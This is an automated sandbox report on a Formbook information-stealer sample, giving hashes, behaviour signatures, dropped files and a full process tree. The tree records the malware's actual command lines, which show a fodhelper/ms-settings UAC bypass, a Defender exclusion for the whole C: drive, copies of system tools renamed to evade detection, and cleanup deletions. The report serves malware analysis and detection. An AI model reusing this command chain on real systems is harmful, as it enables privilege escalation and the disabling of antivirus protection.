Analysis

  • max time kernel: 149s
  • max time network: 150s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240709-en
  • resource tags: arch:x64 arch:x86 image:win10v2004-20240709-en locale:en-us os:windows10-2004-x64 system
  • submitted: 16-07-2024 14:23

General

  • Target: 839098d2b42765abf8c1066900745e03a0da338c.exe
  • Size: 1.6MB
  • MD5: 58f6371fad0f06a8c78026ca2d44e7ee
  • SHA1: 839098d2b42765abf8c1066900745e03a0da338c
  • SHA256: 42039b6edc8a92257987047991f1c99eac490366de4e22ff5f0c3fd8fa31135a
  • SHA512: d59565f0cf902ed54d5cacceff3f29ec78f824c792d5ae75677f26efec825187f0b6356b70a3005df9d8015904fb4c8398c8e499659c2168fccd77a976736aaa
  • SSDEEP: 24576:1Hb5Bli50xv2T4EM9X0cjRjFmhco/ZyFvaZjeCi8DI/fdKFZA16GSbxpSA07YN3O:9b5W+uWRhKV4FceCxyKFZo

Malware Config

Extracted

  • Family: formbook
  • Version: 4.1
  • Campaign: dn03
  • Decoy
Signatures

  • Formbook
    Formbook is an information-stealing malware family.
  • Formbook payload (4 IoCs)
  • Checks computer location settings (2 TTPs, 2 IoCs)
    Looks up the country code configured in the registry, likely for geofencing.
  • Executes dropped EXE (20 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Suspicious use of SetThreadContext (4 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Kills process with taskkill (1 IoC)
  • Modifies registry class (5 IoCs)
  • Runs ping.exe (1 TTP, 1 IoC)
  • Script User-Agent (1 IoC)
    Uses a user-agent string associated with a script host/environment.
  • Suspicious behavior: EnumeratesProcesses (38 IoCs)
  • Suspicious behavior: MapViewOfSection (6 IoCs)
  • Suspicious use of AdjustPrivilegeToken (8 IoCs)
  • Suspicious use of UnmapMainImage (1 IoC)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3548
    • C:\Users\Admin\AppData\Local\Temp\839098d2b42765abf8c1066900745e03a0da338c.exe
      "C:\Users\Admin\AppData\Local\Temp\839098d2b42765abf8c1066900745e03a0da338c.exe"
      2⤵
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Users\Public\Libraries\fyzvilfB.pif
        C:\Users\Public\Libraries\fyzvilfB.pif
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\system32\cmd.exe
          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\82E7.tmp\82E8.tmp\82F8.bat C:\Users\Public\Libraries\fyzvilfB.pif"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\System32\extrac32.exe
            C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
            5⤵
            PID:4452
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            5⤵
            • Executes dropped EXE
            PID:2896
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            5⤵
            • Executes dropped EXE
            PID:1336
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3212
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              6⤵
              PID:3972
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2968
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              6⤵
              PID:3764
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3780
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              6⤵
              PID:4600
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4000
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1232
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3320
                • C:\Users\Public\ger.exe
                  C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                  8⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  PID:4392
          • C:\Windows \System32\per.exe
            "C:\\Windows \\System32\\per.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:2272
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4940
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettings.exe
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3312
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3976
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 2
              6⤵
              • Runs ping.exe
              PID:4356
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
            5⤵
            • Executes dropped EXE
            PID:4336
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
            5⤵
            • Executes dropped EXE
            PID:860
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
            5⤵
            • Executes dropped EXE
            PID:1912
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
            5⤵
            • Executes dropped EXE
            PID:4880
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
            5⤵
            • Executes dropped EXE
            PID:1604
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
            5⤵
            • Executes dropped EXE
            PID:4744
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
            5⤵
            • Executes dropped EXE
            PID:4248
      • C:\Windows\SysWOW64\extrac32.exe
        C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\839098d2b42765abf8c1066900745e03a0da338c.exe C:\\Users\\Public\\Libraries\\Bflivzyf.PIF
        3⤵
        PID:1200
      • C:\Windows\SysWOW64\colorcpl.exe
        C:\Windows\System32\colorcpl.exe
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
    • C:\Windows\SysWOW64\cscript.exe
      "C:\Windows\SysWOW64\cscript.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      PID:3876
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\SysWOW64\colorcpl.exe"
        3⤵
        PID:664
  • C:\Windows\system32\SystemSettingsAdminFlows.exe
    "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
    1⤵
    PID:4024

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\82E7.tmp\82E8.tmp\82F8.bat
    Filesize: 1KB
    MD5: e62f427202d3e5a3ba60ebe78567918c
    SHA1: 6ef0cd5ba6c871815fceb27ff095a7931452b334
    SHA256: 06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
    SHA512: e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kzfwe1yw.ttf.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\Libraries\fyzvilfB.pif
    Filesize: 66KB
    MD5: c116d3604ceafe7057d77ff27552c215
    SHA1: 452b14432fb5758b46f2897aeccd89f7c82a727d
    SHA256: 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
    SHA512: 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

  • C:\Users\Public\alpha.exe
    Filesize: 283KB
    MD5: 8a2122e8162dbef04694b9c3e0b6cdee
    SHA1: f1efb0fddc156e4c61c5f78a54700e4e7984d55d
    SHA256: b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
    SHA512: 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

  • C:\Users\Public\ger.exe
    Filesize: 75KB
    MD5: 227f63e1d9008b36bdbcc4b397780be4
    SHA1: c0db341defa8ef40c03ed769a9001d600e0f4dae
    SHA256: c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
    SHA512: 101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

  • C:\Users\Public\xkn.exe
    Filesize: 442KB
    MD5: 04029e121a0cfa5991749937dd22a1d9
    SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
    SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
    SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Windows \System32\per.exe
    Filesize: 48KB
    MD5: 85018be1fd913656bc9ff541f017eacd
    SHA1: 26d7407931b713e0f0fa8b872feecdb3cf49065a
    SHA256: c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
    SHA512: 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

  • memory/1232-50-0x000001BE733C0000-0x000001BE733E2000-memory.dmp
    Filesize: 136KB
  • memory/1620-87-0x00000000053B0000-0x00000000063B0000-memory.dmp
    Filesize: 16.0MB
  • memory/1620-86-0x00000000053B0000-0x00000000063B0000-memory.dmp
    Filesize: 16.0MB
  • memory/1620-83-0x00000000053B0000-0x00000000063B0000-memory.dmp
    Filesize: 16.0MB
  • memory/3548-91-0x000000000A8C0000-0x000000000A9B6000-memory.dmp
    Filesize: 984KB
  • memory/3788-16-0x0000000000400000-0x000000000041A000-memory.dmp
    Filesize: 104KB
  • memory/3788-15-0x0000000000400000-0x0000000001400000-memory.dmp
    Filesize: 16.0MB
  • memory/3788-77-0x0000000000400000-0x000000000041A000-memory.dmp
    Filesize: 104KB
  • memory/3788-75-0x0000000000400000-0x0000000001400000-memory.dmp
    Filesize: 16.0MB
  • memory/3788-10-0x0000000000400000-0x0000000001400000-memory.dmp
    Filesize: 16.0MB
  • memory/3788-13-0x0000000000400000-0x0000000001400000-memory.dmp
    Filesize: 16.0MB
  • memory/3876-88-0x00000000005D0000-0x00000000005F7000-memory.dmp
    Filesize: 156KB
  • memory/3876-89-0x00000000001C0000-0x00000000001EF000-memory.dmp
    Filesize: 188KB
  • memory/4736-0-0x0000000002340000-0x0000000002341000-memory.dmp
    Filesize: 4KB
  • memory/4736-1-0x0000000000400000-0x00000000005A4000-memory.dmp
    Filesize: 1.6MB